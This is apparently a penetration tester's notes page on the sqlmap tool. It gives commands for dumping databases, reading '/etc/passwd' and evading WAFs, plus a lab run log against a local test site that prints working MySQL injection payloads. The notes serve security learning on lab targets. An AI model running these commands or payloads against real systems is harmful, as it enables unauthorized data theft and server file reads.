SQLMap

Commands

sqlmap --flush-session

Detection

The --level flag affects which payload sqlmap tries and which injections points are tested, while the --risk flag adds more SQLi types.

Value

Level (1-5)

Risk (1-3)

GET and POST parameters are always tested (default value)

Innocuous for the majority of SQLi points (default value).

HTTP Cookie header values.

Adds heavy query time-based SQLis.

HTTP User-Agent/Referer headers values.

Adds OR-based SQLis.

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch -v 0

Data Exfil

# List databases
sqlmap -r burp.req --batch --dbs
# Current database and user
sqlmap -r burp.req --banner --current-user --current-db --is-dba --batch

sqlmap -r burp.req -D testdb -T testtable --dump --where="col1 LIKE 'f%'" --batch -v 0

Advanced Data Exfil

sqlmap -r burp.req --search -T tableName --batch -v 0

OS Exploitation

sqlmap -r burp.req --batch -v 0 --file-read "/etc/passwd"

DBAs need certain privileges to be able to write files. Local access is also required such as write permissions in the directory we want to write to.

Bypasses

sqlmap -r burp.req --batch -v 0 --randomize=rp

sqlmap -r burp.req --batch -v 0 --level=5 --risk=3 --tamper=charunicodeescape --delay 3

Usage

Basic Usage

$ sqlmap -u "http://127.0.0.1/vulnerabilities/sqli/?id=test&Submit=Submit" --cookie "PHPSESSID=23k5fk90ga91i036avi44m2mr2; security=low" --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.5#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:50:58 /2024-06-05/

[12:50:59] [INFO] testing connection to the target URL
[12:50:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:50:59] [INFO] testing if the target URL content is stable
[12:50:59] [INFO] target URL content is stable
[12:50:59] [INFO] testing if GET parameter 'id' is dynamic
[12:50:59] [WARNING] GET parameter 'id' does not appear to be dynamic
[12:50:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:50:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:50:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:50:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:50:59] [WARNING] reflective value(s) found and filtering out
[12:50:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:50:59] [INFO] testing 'Generic inline queries'
[12:50:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:51:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[12:51:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[12:51:00] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[12:51:00] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:51:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:51:00] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:51:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:51:00] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[12:51:00] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[12:51:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:51:00] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:51:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:51:00] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:51:00] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:51:00] [INFO] testing 'MySQL inline queries'
[12:51:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:51:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:51:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:51:00] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:51:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[12:51:00] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[12:51:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:51:10] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[12:51:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:51:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[12:51:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:51:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:51:10] [INFO] target URL appears to have 2 columns in query
[12:51:10] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[12:51:10] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=test' OR NOT 7718=7718#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=test' OR (SELECT 6333 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(6333=6333,1))),0x71786b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XGxV&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=test' AND (SELECT 8341 FROM (SELECT(SLEEP(5)))BInm)-- SaYq&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=test' UNION ALL SELECT NULL,CONCAT(0x7176627071,0x435a6a45595a5654536763586e45714c5748486a74697668486d7463614b674548436a7971586f55,0x71786b7071)#&Submit=Submit
---
[12:51:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:51:10] [INFO] fetched data logged to text files under '/home/x7331/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:51:10 /2024-06-05/

cURL

The lab used is from the Web Enumeration & Exploitation section of the Attacking Enterprise Networks module from HTB.

Copy as cURL from browser's Network tab (Figure 1).

Change curl to sqlmap (Figure 2). If a specific parameter needs to be tested, we can use the * as follows: --data 'uid=1*&name=test'.

--batch chooses the defaults when prompted, -v 0 reduces the verbosity level.

HTTP Requests

Capture the Request Headers and POST data via the browser or Burp (Figure 3).

From Mozilla Copy Value -> Copy Request Headers and then add the parameters via Copy Value -> Copy POST Data.

Supply the file to SQLMap (Figure 4).

Resources

GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover toolGitHub

PreviousOther NextXSS

Last updated 8 months ago

Was this helpful?